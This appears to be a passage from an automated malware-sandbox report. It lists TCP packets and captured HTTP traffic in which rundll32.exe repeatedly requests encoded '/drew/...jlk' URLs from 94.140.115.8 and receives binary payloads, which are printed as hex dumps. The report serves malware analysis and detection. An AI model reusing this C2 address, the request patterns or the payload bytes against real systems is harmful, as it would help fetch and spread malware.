                            Apr 28, 2022 15:47:52.470540047 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:52.470552921 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:52.470587969 CEST4975980192.168.2.494.140.115.8
                            Apr 28, 2022 15:47:52.470613003 CEST4975980192.168.2.494.140.115.8
                            Apr 28, 2022 15:47:52.492372036 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:52.492404938 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:52.492422104 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:52.492434025 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:52.492525101 CEST4975980192.168.2.494.140.115.8
                            Apr 28, 2022 15:47:52.492556095 CEST4975980192.168.2.494.140.115.8
                            Apr 28, 2022 15:47:52.493151903 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:52.493201017 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:52.493232965 CEST4975980192.168.2.494.140.115.8
                            Apr 28, 2022 15:47:52.493268967 CEST4975980192.168.2.494.140.115.8
                            Apr 28, 2022 15:47:52.493300915 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:52.493314981 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:52.493350983 CEST4975980192.168.2.494.140.115.8
                            Apr 28, 2022 15:47:52.503247023 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:52.503277063 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:52.503293037 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:52.503308058 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:52.503416061 CEST4975980192.168.2.494.140.115.8
                            Apr 28, 2022 15:47:52.503434896 CEST4975980192.168.2.494.140.115.8
                            Apr 28, 2022 15:47:52.525259018 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:52.525288105 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:52.525306940 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:52.525325060 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:52.525341988 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:52.525365114 CEST4975980192.168.2.494.140.115.8
                            Apr 28, 2022 15:47:52.525382042 CEST4975980192.168.2.494.140.115.8
                            Apr 28, 2022 15:47:52.525393963 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:52.525408030 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:52.525435925 CEST4975980192.168.2.494.140.115.8
                            Apr 28, 2022 15:47:52.525456905 CEST4975980192.168.2.494.140.115.8
                            Apr 28, 2022 15:47:52.526645899 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:52.526670933 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:52.526705980 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:52.526717901 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:52.526736021 CEST4975980192.168.2.494.140.115.8
                            Apr 28, 2022 15:47:52.526747942 CEST4975980192.168.2.494.140.115.8
                            Apr 28, 2022 15:47:52.526797056 CEST4975980192.168.2.494.140.115.8
                            Apr 28, 2022 15:47:52.527530909 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:52.527556896 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:52.527574062 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:52.527585983 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:52.527611971 CEST4975980192.168.2.494.140.115.8
                            Apr 28, 2022 15:47:52.527632952 CEST4975980192.168.2.494.140.115.8
                            Apr 28, 2022 15:47:52.558998108 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:52.559027910 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:52.559046984 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:52.559066057 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:52.559082985 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:52.559098959 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:52.559113026 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:52.559135914 CEST4975980192.168.2.494.140.115.8
                            Apr 28, 2022 15:47:52.559185982 CEST4975980192.168.2.494.140.115.8
                            Apr 28, 2022 15:47:52.559232950 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:52.559247017 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:52.559269905 CEST4975980192.168.2.494.140.115.8
                            Apr 28, 2022 15:47:52.559310913 CEST4975980192.168.2.494.140.115.8
                            Apr 28, 2022 15:47:52.636763096 CEST4975980192.168.2.494.140.115.8
                            Apr 28, 2022 15:47:52.710238934 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:53.034704924 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:53.034733057 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:53.034774065 CEST4975980192.168.2.494.140.115.8
                            Apr 28, 2022 15:47:53.034794092 CEST4975980192.168.2.494.140.115.8
                            Apr 28, 2022 15:48:47.712887049 CEST4975980192.168.2.494.140.115.8

                            HTTP Request Dependency Graph

                            • 94.140.115.8

                            HTTP Packets

                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            0192.168.2.44975994.140.115.880C:\Windows\SysWOW64\rundll32.exe
                            TimestampkBytes transferredDirectionData
                            Apr 28, 2022 15:47:50.266267061 CEST1155OUTGET /drew/ik1LQOZMh/mVRbIyzEQTxBwTr6Z5u6/zI22UmjAz8JK2nSoDWz/PBbBE92xQ6eDvkHhGI4LUa/C2IzDYhRuCy1X/B8bDGu4d/NNeE2BpCwJS_2BLL1GATet_/2FJaGdNT8S/qykJG_2BzgaYwDsmt/6L38BacVeBDK/DI5poywJVgk/0BVE0JF2RsEX1d/ehK8HVo5nM5dN_2BvfT0B/d2eei3kq6JFp_2Bo/wjjnHOVxOWAf9Rl/iq5emFWqLQuh9aW2bI/a4pKOz5Hp/Nn13tipc/V.jlk HTTP/1.1
                            User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                            Host: 94.140.115.8
                            Connection: Keep-Alive
                            Cache-Control: no-cache
                            Apr 28, 2022 15:47:50.638051987 CEST1156INHTTP/1.1 200 OK
                            Server: nginx/1.14.2
                            Date: Thu, 28 Apr 2022 13:47:50 GMT
                            Content-Type: application/octet-stream
                            Content-Length: 186004
                            Connection: keep-alive
                            Pragma: public
                            Accept-Ranges: bytes
                            Expires: 0
                            Cache-Control: must-revalidate, post-check=0, pre-check=0
                            Content-Disposition: inline; filename="626a9b068dec4.bin"
                            Data Raw: 82 b0 5a f9 80 5c 88 d2 b9 a9 03 66 fc cb 05 5a 55 e1 a3 0c 1d f4 74 76 10 8c be b1 96 6a c9 05 cb 3a 20 f7 40 97 8d cf 82 7e d8 63 47 d6 66 53 a2 b2 df 46 50 eb 66 05 3b 69 3c 4e e7 2d b7 c5 9a 11 b9 f1 b6 05 bd 93 ed 4a 54 06 08 f8 24 04 14 8b 92 a3 63 12 78 a9 c3 92 cb d4 7c 87 14 e4 63 d4 05 20 f9 3c 6a 5f f1 7e 65 84 63 e2 4e 82 6e 48 23 ef 28 da 52 05 8e fb 30 d8 02 06 d9 d3 14 82 03 b0 45 35 de 9c 1f 71 d0 9b 3a c9 80 0c 04 e9 c4 55 c2 8e 9b 6b 71 37 e2 ab 42 c6 3a 26 d7 99 03 87 ed 51 05 fb a8 a8 86 c5 a1 e5 48 fd 9b 55 b0 f2 2d 73 08 e3 2f 3a bb 98 30 78 3c 0f 13 bf 4c 26 40 74 75 92 a2 bf 07 20 f8 3f 0a 84 8a ab fc df cf 71 74 b4 60 79 99 09 2d 7f 82 52 87 b6 5b 77 e2 98 6c 4b 07 fc 75 8b 6f 2e 0c 46 a5 fb cb 29 1a fd d8 c3 8d d4 6e 88 55 e5 34 e2 23 de c9 96 57 7e 4d 02 39 75 cb 23 c3 1e b7 9a d8 de 82 90 27 64 d6 fb 51 22 ec 6d 93 97 e8 7d 81 8c 5e 56 ae a1 23 f9 43 ad c1 0e 4c 7e 2f f7 4a f9 22 7c 26 e9 77 05 f2 81 80 74 bc 08 25 7f 80 7f c4 eb 84 4c ac 58 d2 03 f0 4a 39 cc 31 80 de 78 83 47 b7 4e c4 b8 56 a8 ad 9c 7d 09 0a 70 63 f8 9f 4a 53 24 3f 4a c8 58 39 a2 b7 9c 4a ef 6e 4a 5b f4 22 58 ba 98 04 7a 10 d5 aa fe 88 33 0c e5 14 16 6f 60 a5 50 24 b4 2a 29 d7 6b f0 76 b1 e2 fd fc 14 f6 86 09 f4 cc d3 9d f7 2e fd 1f f4 a0 ca fe e7 27 dd 71 dd dd 64 b5 31 24 30 94 6c ba 10 fc 1c dc 1d bb e6 97 84 46 58 ca 9c e6 ed 19 10 f6 cf a1 08 89 ff c8 d5 aa 0e 42 31 98 56 c5 75 60 2d ab e7 b0 3d a1 48 ed 3e 89 1b 2c 21 10 57 45 6e 61 aa 8f a5 ad a1 66 2b e2 ac 70 4f 75 c1 65 d0 45 ef 80 32 2b 20 e4 d8 4a da ea 62 0b 77 45 56 1d 01 fe 80 42 8f 6b 26 4f 6c 1d 53 82 9a 60 a2 db 4f fe 2c 50 1a 2b d0 73 cc 11 05 db 08 70 85 06 1f 8b 9c ea 4c f8 36 5a 6e a6 0e e3 02 59 b7 d5 cd 3b 24 ed d7 bf 65 b2 8a 84 7c 35 da 68 c0 2e cc 63 4e 6c b6 71 9a 51 95 6a 9a e1 e1 78 fb 92 40 9d 77 c6 d0 9a 02 5e fd e5 ca 48 a1 d1 c9 3f 81 de 26 d8 62 71 f2 91 36 fd 34 7c d5 0e 3e 11 7a 05 b6 84 b3 01 33 13 f0 a5 86 ee 24 b7 1e 71 3d 73 98 0c 6b 3b b1 21 28 04 71 0f da 1c 37 6e 5e 3f 29 06 e4 e0 6e c1 7d 2b a8 1e d9 fe e8 ae c8 27 e7 2f 17 f9 20 25 24 3f de 68 e7 f5 24 79 71 22 a2 52 95 43 c5 05 f4 4f 1b 7a a6 b9 2d c8 2a d5 3d 92 db 83 04 55 20 07 68 f7 3b 47 1a 47 62 e6 0a 9a ab c2 3a f9 95 2b 59 ff 50 44 c0 bd 3c d4 39 74 20 a7 fc bf d9 ab b2 a7 e4 4d ee 69 b4 4e 36 21 29 8a 39 0a ec 3b df 04 06 df 56 d4 10 92 74 a2 85 4c 1a d1 61 18 59 70 75 4e e9 ac 21 f0 9e e9 3c 7d 93 a9 4e ad 40 74 f0 cd 04 23 85 d8 62 16 75 5c 97 69 e3 16 65 d3 46 da 89 df 99 fb 57 32 2f b1 f2 35 24 bc d7 6d f5 01 bc ea fb a7 7d c5 d7 94 77 f9 50 ae 5d 7f 68 db 96 fa 5d 2d 47 68 bb 5d a9 41 93 11 90 87 87 82 32 7a ff 01 7a 72 5b b5 f2 b9 99 e6 32 1f 64 f2 b6 90 76 93 18 1b 0f ef 4c 57 80 cf 3a 59 8f b4 c3 d5 fc d2 cb c6 f9 01 4d c9 51 08 61 7a ad 91 e5 16 b0 ba 70 85 d9 7c 5d 96 9b 20 c5 23 f7 93 32 8d 34 8f 3d 39 c5 81 cf 4a 0b a6 f8 bc be 1b 3f 87 93 06 7c 29 ed 6a ba 6c 6a ff 37 9e 8d 30 81 6d e7 4e 8c 37 de f7 39 5f 8b 00 2f af 4d ea 56 2f 78 61 34 ce 07 d3 37 8b 51 99 02 dc 02 3f f4 31 de 2f 44 2f c5 e9
                            Data Ascii: Z\fZUtvj: @~cGfSFPf;i<N-JT$cx|c <j_~ecNnH#(R0E5q:Ukq7B:&QHU-s/:0x<L&@tu ?qt`y-R[wlKuo.F)nU4#W~M9u#'dQ"m}^V#CL~/J"|&wt%LXJ91xGNV}pcJS$?JX9JnJ["Xz3o`P$*)kv.'qd1$0lFXB1Vu`-=H>,!WEnaf+pOueE2+ JbwEVBk&OlS`O,P+spL6ZnY;$e|5h.cNlqQjx@w^H?&bq64|>z3$q=sk;!(q7n^?)n}+'/ %$?h$yq"RCOz-*=U h;GGb:+YPD<9t MiN6!)9;VtLaYpuN!<}N@t#bu\ieFW2/5$m}wP]h]-Gh]A2zzr[2dvLW:YMQazp|] #24=9J?|)jlj70mN79_/MV/xa47Q?1/D/
                            Apr 28, 2022 15:47:50.638118029 CEST1158INData Raw: 8a b3 48 f9 13 42 87 27 09 62 c8 7d ce a5 fb b2 d7 64 a5 ea 44 e0 86 41 37 2a f5 fb ef 21 81 8f b1 63 e6 08 13 8e a3 e7 3d 4e e4 ba 38 87 56 fc 5b 52 20 5c 5f 8f 57 5c 9f f4 70 46 e3 c7 6d 4c de 3b 8e 0d 35 c6 4b 62 72 a7 c8 74 d1 2a 29 d7 27 c7
                            Data Ascii: HB'b}dDA7*!c=N8V[R \_W\pFmL;5Kbrt*)'{O&Wnua.?JPp'cI,t2"?j8x?(:D M>k,+4%<O4Ix$.kI%>+p(buk5ZBQ[K9g
                            Apr 28, 2022 15:47:50.638174057 CEST1159INData Raw: a5 fc 54 33 2b 59 94 6c a3 67 b6 a2 fe 20 2f 26 ee 24 6c 37 28 7b f1 66 fd a2 fb c5 77 33 c5 65 75 87 b2 6e e6 df 91 80 cb e8 ed 8e 08 7b bf fa 52 be a4 28 f1 98 b2 cd 0d 31 fd e6 2d 43 e2 60 8f 29 7b 0f af 60 58 e3 ce 89 f2 42 10 6f 28 2f 6d 3c
                            Data Ascii: T3+Ylg /&$l7({fw3eun{R(1-C`){`XBo(/m<+}C;)!e!AY!Bh)E~0?XtX)^6p!lp;G:PtE%V .z6ycYl-9RI{|oR'-+]m\9.j.(T:
                            Apr 28, 2022 15:47:50.638236046 CEST1160INData Raw: 88 92 c0 5d 63 28 b3 c0 87 35 9b 2d 54 1e 5c 8d aa 1d ac 55 72 32 8a 05 25 9e 34 4e 04 3b 0b 4c e3 42 e8 07 94 bf 8f 4f 8c 8e 45 39 6b d0 1f 26 87 e8 db 07 b1 2f f5 13 af f6 bc dd cf 2b 37 6b 9d 3f 33 e1 6e 15 8f 2d ef 0c 0b 61 3f e4 9b 5a d7 1b
                            Data Ascii: ]c(5-T\Ur2%4N;LBOE9k&/+7k?3n-a?ZFML7v1TG8n>>4Qr$OQUnUeXffsQ{.&/s~0JkV#(ht,P]\8'UuD:+@Vuswxqs<a%VA
                            Apr 28, 2022 15:47:50.638349056 CEST1162INData Raw: ce 14 7c 64 29 63 70 16 4a 70 c5 0f 99 ef 4d 7b 9f ef 05 55 bf d8 cc 23 5b f4 59 93 7e 99 75 8f af 79 05 76 44 93 7d 41 18 48 db 7c 08 60 71 d8 3d d0 fe 64 8f c7 d2 1e db 96 64 4e 6a d7 08 fb 15 e3 e1 7e 36 8b 45 5e 0e 67 5f ab 1f 72 52 c2 5f 19
                            Data Ascii: |d)cpJpM{U#[Y~uyvD}AH|`q=ddNj~6E^g_rR_$1rtq1H_A+)J#-5lbIpY+J{*f3t{~t+$a4:Ix^dnym|/A8eLvNYru(:~a|R5YP
                            Apr 28, 2022 15:47:50.638394117 CEST1163INData Raw: 8d ae cd 77 87 1c ff a7 3b 15 a0 4c 68 83 fa 42 af ae 6b 32 5f 56 7b ea 64 ee fc 78 a8 cc cc 5f a2 af 1f b1 90 ab ab af c6 48 e1 02 50 aa 1b d0 4f d8 ac e2 69 74 21 78 86 67 dd e7 40 b2 c6 e5 77 1d 01 31 68 39 f4 ab 72 92 37 33 c8 08 6d 4c 0c b4
                            Data Ascii: w;LhBk2_V{dx_HPOit!xg@w1h9r73mL/[eZ]sw6-zQ[R.]IojR:-7~"'6EecYp7$CKR|y<3xq`RMw]h]
                            Apr 28, 2022 15:47:50.638417006 CEST1163INData Raw: 6f 97 14 38 b0 22 d5 bb f9 bd 62 03 fc 54 47 52 19 0b 8e c2 ea 35 54 6e a1 ba 40 d2 b2 55 fb 0e 22 81 f0 0e ac a4 1b b1 87 d2 55 25 54 22 af a7 bb c4 1b 84 71 7c 0a 7e c1 e2 6c d7 95 6b 73 28 cc ba 29 13 f6 bf e4 60 77 d1 8d 68 80 e7 00 83 ee 63
                            Data Ascii: o8"bTGR5Tn@U"U%T"q|~lks()`whcQG&b}9;v~!9&P+ y}]|r<8~;4KgAj
                            Apr 28, 2022 15:47:50.638451099 CEST1165INData Raw: e8 62 c4 13 82 2d 0c 09 ca 9d 73 9e df e8 09 46 fc 58 56 65 c8 d9 43 69 92 18 42 03 d2 23 07 75 39 e8 9a 80 9c 7a 7a bf 64 df a6 f0 59 3b 02 3d 7b 5c e7 9a 94 e4 7e c7 e5 3e d8 ee 3c 28 48 7e ab 84 9a 35 ff 88 9b d0 09 ac c7 cd 49 0a 04 db de 9d
                            Data Ascii: b-sFXVeCiB#u9zzdY;={\~><(H~5I\B973^5?:hRa,cCtB|?V9zI][BRhXp4A'w_hgaK0`3*#:xQ95n5"py*tr+C
                            Apr 28, 2022 15:47:50.638581038 CEST1166INData Raw: 86 6c da 52 f2 56 67 14 fe 19 5d 25 0b 9f 19 d9 48 4b d0 67 2f 85 a4 d5 bf eb 18 4e 58 f0 b7 07 c3 a8 94 4d b8 ce b9 25 f9 87 ea 52 8c d1 89 8a de 06 1b f2 e5 7f 31 cd 00 cb a8 3a 9c 9b 21 bd 78 97 31 29 be 29 53 2a 42 2f e2 6e a0 29 ad 32 e5 bb
                            Data Ascii: lRVg]%HKg/NXM%R1:!x1))S*B/n)2d3B@I#mEW+hE[!7pYscJHT`_&v ?5iwdnC,1!8WN/Ks]Pz[Y.*HXC-|
                            Apr 28, 2022 15:47:50.638623953 CEST1168INData Raw: c6 3e 66 ea 7d 49 fa a7 ab 16 cb 95 0c 07 01 b6 25 f9 47 5d 14 4a 6b 4a 41 fa 1b 89 b5 5b 57 78 9d 29 1f 9f 13 d2 c0 e2 40 80 61 0d 5e 92 60 48 4f ee 8c 1c 4b d5 61 02 bf c5 3a e7 8d 5f 93 4e b0 3e 36 67 0b ea 7e f7 a6 35 28 c7 2e 49 8a ec 46 30
                            Data Ascii: >f}I%G]JkJA[Wx)@a^`HOKa:_N>6g~5(.IF0zOUF<^+oHPP>~y<!*;}v,HN[-Qs4Y,81:wi$N>7?#(H*:$0B(o@\O &-#:dq
                            Apr 28, 2022 15:47:50.726372004 CEST1169INData Raw: 18 20 0c 7a 9f 2a e6 b1 a6 19 de b9 4c 14 cc a5 0b e0 d3 4d 75 75 b0 e3 c2 52 50 f0 be fd 05 e6 27 63 4a ec 92 fa f0 c0 d3 93 4d a0 a1 b6 30 30 7f 5b 7a 75 ad cf ba 88 f0 29 43 b3 01 32 0b 2b 2f 1f ae d0 8c 86 dc 01 9d eb 62 5e d3 3f 8b 19 c5 27
                            Data Ascii: z*LMuuRP'cJM00[zu)C2+/b^?')OZUVm}I%.~ 5[LN@#9P08qwgUM)dnwEHuB`6iZno;`fx\`pHhr):K^
                            Apr 28, 2022 15:47:51.337693930 CEST1352OUTGET /drew/BCNeqjF198SdSe826/ArOdCqmPIWdy/mLsvCOAaonH/_2B_2FaHw_2FNP/whZllPw0UWDpWxMk3vD70/ZW7HQlXyVsLFMEnd/ioWk92wZdXi7gVZ/YpqeONxg_2FtJ1pLE0/gkg_2BzOr/T30turd_2FCKY_2FdW3S/SQG35opQqK5eweX5X3z/X5WbnNy0h0F7CgoMJPXQn8/WlhTd00F2BAHX/eC3JkGFi/jMv01ywCxcdZG9_2BXsKQ2k/cWPyDUzVgF/HeX7VJFkhkvecZXZ0/41xqfgFNRUy_/2Fgmw0qSg6Ao/JqGQVxm.jlk HTTP/1.1
                            User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                            Host: 94.140.115.8
                            Connection: Keep-Alive
                            Cache-Control: no-cache
                            Apr 28, 2022 15:47:51.747339010 CEST1353INHTTP/1.1 200 OK
                            Server: nginx/1.14.2
                            Date: Thu, 28 Apr 2022 13:47:51 GMT
                            Content-Type: application/octet-stream
                            Content-Length: 238744
                            Connection: keep-alive
                            Pragma: public
                            Accept-Ranges: bytes
                            Expires: 0
                            Cache-Control: must-revalidate, post-check=0, pre-check=0
                            Content-Disposition: inline; filename="626a9b07a777c.bin"
                            Data Raw: 70 f4 cc a4 a7 b2 26 b8 47 5b c3 6f ba 9f ad f4 6d 09 c9 57 ca 26 0a 77 61 b4 3b a2 dc 3e 2d dc fd 52 b9 28 2b c3 ca b3 88 6b 09 50 34 4e d9 18 8a b3 b9 ea 6b 95 93 71 91 d0 67 6d da 30 3d 53 6b ad 1f b2 e4 21 61 9d 9c e8 01 f5 70 db a1 51 44 9d eb 06 74 37 e8 05 6e c4 e1 a8 80 15 fd ec 0e 03 b9 dc fa 2d 50 ee a3 6c 36 a5 49 32 9e 11 b1 03 6a f1 fd 61 b4 74 91 d3 39 cc 8a 37 0c f7 89 35 23 24 de 9c e5 f4 d0 53 67 76 5d ac 15 ba d7 f8 f7 17 47 af 20 21 18 84 71 2c 5e 58 a7 e5 54 70 ea 39 03 53 ec 37 54 63 29 79 4a 6b 98 5e df 82 31 70 9d f9 1e 0e e7 cb d9 d9 d6 44 5e b5 9b b0 0f a2 32 d3 24 de 19 f8 e6 3d 5c 70 ae d6 69 d8 ef 38 bf a9 45 b3 52 c4 f3 ad d1 72 10 f9 74 65 27 2f cf d9 d2 bf 06 a4 5c a8 67 ea 8e e9 cf 24 c0 9b c5 7f b0 fa b5 a3 f7 30 41 b6 ca ed c2 c7 ca ea 24 79 61 bc 3d 78 48 f6 55 e5 f2 1d 23 c7 5f 90 b0 50 64 f8 d4 0d e6 fe a3 fe 2e b4 05 f1 32 3e 84 f3 c5 fd ae ec 86 c7 d3 1d a0 ba a8 5d 08 54 69 80 4b 9e 82 1b 71 1f 32 75 a9 9b 9e e3 b1 a7 fa 45 22 0b 6e 03 37 5b 77 15 a8 c8 4a ae 08 d9 45 68 21 4b 27 cf ae 51 0e 2c 91 c7 7a b0 6b 32 16 59 ad 7c 06 7d be 87 77 0d d0 74 e3 01 69 49 e7 b2 bf 84 a2 fb a3 8e b5 67 93 36 21 63 89 14 83 44 74 60 ef ec d8 16 f6 d3 70 77 0f df 4f 09 3b b2 53 69 2a 32 c6 1f fa de 0d 26 ee f7 d2 54 64 fb 77 49 e2 a4 ca 2f 00 7d 94 1b 7d 93 96 63 02 99 55 cc ae 01 70 7d 40 46 e6 32 1b 9b 27 c7 33 85 3f 65 81 cb 20 23 2a 71 1a af 49 a6 07 49 3a 76 74 49 ae b1 2b 70 b1 83 02 59 72 a9 b0 6b 63 59 d6 9e 8d 07 9e 18 8b 6e 15 22 b0 a2 f6 d5 0c 9c 25 17 1e 55 b3 c5 b8 3f f2 4b 42 6e 6b 7b ec 7a 93 23 59 ae 71 57 ea 08 8d b3 47 d3 83 0d af 46 44 0c 89 06 1d 2b c5 b2 ed e7 9b 18 75 48 be e7 95 86 4d a9 f8 87 4a fe 74 0e 91 e1 bb 65 57 72 ec 1c ba 89 d0 f8 b7 db 3c e9 3e 12 68 53 8d 92 5f 43 38 d0 c3 bb f6 43 bc 18 04 34 95 3f a0 bb 80 98 cc 86 18 bf 26 33 44 c0 fd e4 04 74 73 81 ef 79 82 1b 1d 63 e1 12 94 64 48 8b fd 2e 1c ab ae 1e 25 46 96 33 57 55 98 f1 1b 26 1b 5e 9d 24 e2 52 83 df 1b 03 38 da fd dc 65 13 04 ee 6b 55 c4 9b b5 33 48 24 24 01 32 02 b0 f9 81 bf 43 11 4b 23 a9 54 40 87 82 f8 90 fe 49 58 95 6e b1 e5 b4 c2 15 3a 56 20 ee c6 de e5 7b f2 b1 47 ad 54 af ec bd 79 0b 72 4e 55 bc fc 33 9b db f9 f9 31 a5 fb cb 9e 93 e5 f4 c9 6b 53 e8 08 11 29 de 49 e0 b8 c2 2d c9 31 14 d6 88 30 af 91 61 cf 84 a3 65 4d a4 5f 29 83 a8 b1 86 5c 77 2b 4f 20 15 e5 ef 2b 55 81 0c ed ef 27 62 c7 59 80 7b 37 42 c8 db dc 61 ee 0b 37 6e 77 85 88 66 a5 1c 54 42 b1 29 83 ac af 1e 28 1e 25 f0 4e 09 d9 d6 44 2b 14 cf 64 17 d2 8f 61 26 36 e5 58 12 5f 42 12 54 8c 94 ba e0 1c a3 cc 79 fa 92 1a 85 80 f4 8f 14 f1 75 f3 2f 9e ed 86 0f 60 77 6b ce 41 2a e7 ed 06 b1 c2 19 eb 73 7f d0 1e d3 9e 34 89 ed f0 cd b6 6c 73 20 ed 09 90 b8 67 a1 bc ca 3b 1a b8 f3 73 01 01 9e 53 e5 cc 5c 95 cd 18 0b 87 e1 27 52 20 23 2f 08 fd cd 23 3d 55 41 95 b0 ad fe b4 f9 e3 a8 b0 71 6e ea 23 f2 b1 3e a6 e6 d9 f4 ab 2f cc f7 48 bc 42 cc 1c e2 87 f5 6f 13 a6 48 34 ff b8 64 5f ae 65 30 50 13 ec 22 34 58 69 d1 0e f6 80 92 36 f6 de 70 f7 9e 42 bd 59 04 89 3e 27 df c7 52 0f 10 05 2b 93
                            Data Ascii: p&G[omW&wa;>-R(+kP4Nkqgm0=Sk!apQDt7n-Pl6I2jat975#$Sgv]G !q,^XTp9S7Tc)yJk^1pD^2$=\pi8ERrte'/\g$0A$ya=xHU#_Pd.2>]TiKq2uE"n7[wJEh!K'Q,zk2Y|}wtiIg6!cDt`pwO;Si*2&TdwI/}}cUp}@F2'3?e #*qII:vtI+pYrkcYn"%U?KBnk{z#YqWGFD+uHMJteWr<>hS_C8C4?&3DtsycdH.%F3WU&^$R8ekU3H$$2CK#T@IXn:V {GTyrNU31kS)I-10aeM_)\w+O +U'bY{7Ba7nwfTB)(%ND+da&6X_BTyu/`wkA*s4ls g;sS\'R #/#=UAqn#>/HBoH4d_e0P"4Xi6pBY>'R+
                            Apr 28, 2022 15:47:52.636763096 CEST1605OUTGET /drew/pWUKzJDbrhpv/FFkNspqcCVD/4ANu5UR3K56aq1/YlZTd4vqqjxlSWQE81tmv/0903hK9AGVho5G_2/FPX1B2ZeY41YUql/9Zl7hUh81wcOKdUUaq/Z_2FlHHRh/JDsEpYdxv2Sil3Q8A91e/jYpDxmigXCYZ8PDT72P/GzAMhzuxMmNvrbZtpOxqlx/F1jRyqu5A3bI6/9P2_2BGh/CvwgeSwx46r_2FQDHgxUtUu/VEvc4RUsji/nf7CiGV7ZHZfisjbY/l_2FOYdkMf6Q/cPBDnAZaABD/3v7KHlHBv_2B/_2BGS0Es/y.jlk HTTP/1.1
                            User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                            Host: 94.140.115.8
                            Connection: Keep-Alive
                            Cache-Control: no-cache
                            Apr 28, 2022 15:47:53.034704924 CEST1606INHTTP/1.1 200 OK
                            Server: nginx/1.14.2
                            Date: Thu, 28 Apr 2022 13:47:53 GMT
                            Content-Type: application/octet-stream
                            Content-Length: 1865
                            Connection: keep-alive
                            Pragma: public
                            Accept-Ranges: bytes
                            Expires: 0
                            Cache-Control: must-revalidate, post-check=0, pre-check=0
                            Content-Disposition: inline; filename="626a9b08ef40f.bin"
                            Data Raw: 13 c8 48 02 7e 92 9b 44 9c 80 e3 6e 2a f8 f3 75 79 58 37 d9 61 c6 1b e4 d8 93 7d 37 75 01 12 d2 d0 2b 2f 69 5d ac 0d 29 e1 ed 10 b5 cc ea 27 9f ad 49 81 4e 50 ac 8e da db 88 93 13 bd ea a0 ec 3a c4 3a 5b ef b7 d0 7f 06 cc 90 ad 9b e9 95 fa 32 b7 86 e9 8c 81 89 a6 d6 ba b9 9a c2 3c 39 70 b2 23 b3 5a b8 27 98 32 fe 60 3b 8c ad a1 c0 68 98 99 41 b6 e0 0b 1b bb 99 3b 8f b1 77 50 75 d9 fb b6 0d 7e e6 78 02 36 bf f9 4b e5 d9 7e b7 8f 03 ed 31 a3 a0 dd 16 d3 d3 f1 bd b1 11 8e 79 1a b6 14 10 d4 33 de 12 80 68 4e e5 8d 21 73 47 45 58 98 ba 2f ea bb d0 df 50 d3 4f de 07 ba dd 02 ca 88 47 9e b5 32 3f 2c 9d 03 8e 52 93 26 2f f6 92 ad 4e bf a1 80 42 37 3f d2 48 0b fb 88 54 e8 12 ed de 44 ee 93 07 f1 bc 5a 5f a3 f5 49 94 dc 1d 82 bf 3f d3 7e e1 d7 76 1c 3b b8 f1 06 b5 fe 86 c1 aa b9 65 bf f7 0e 75 3d e5 ef b2 c8 ee f3 b1 3a 50 b6 be 3e aa 47 82 8c cc b2 22 fb 1b 03 33 6d 86 a3 c8 3c b7 38 0c db 03 96 2b 3f 45 85 3e fc 1d 8e 9f 93 bb 52 dd 88 95 a3 e0 f6 33 5e a8 1c 24 46 36 9c a6 73 40 3d 18 6c a5 08 c5 af 02 57 15 e4 80 67 47 df e9 71 c1 14 6f 02 a7 80 8b c8 6e d2 e0 57 d4 7c c1 3a b7 99 9d db 11 c3 47 2a 12 77 cf d9 5b 06 b5 f9 bd 01 2f ec 21 db a8 ce 75 f5 3a 04 5e 14 b6 51 27 8f 16 49 94 da 77 1d bd cd 5e 4a 4b 7d d1 e3 f4 3f 5c 1a 33 7e 91 5f 94 c0 41 07 68 9d cd 6b 72 e4 34 18 1c f3 72 6e a1 d4 b9 1c 49 84 6c 47 11 f3 57 f0 54 32 2e 0b 32 96 ed 10 ae 5b fa 0d 16 80 3d 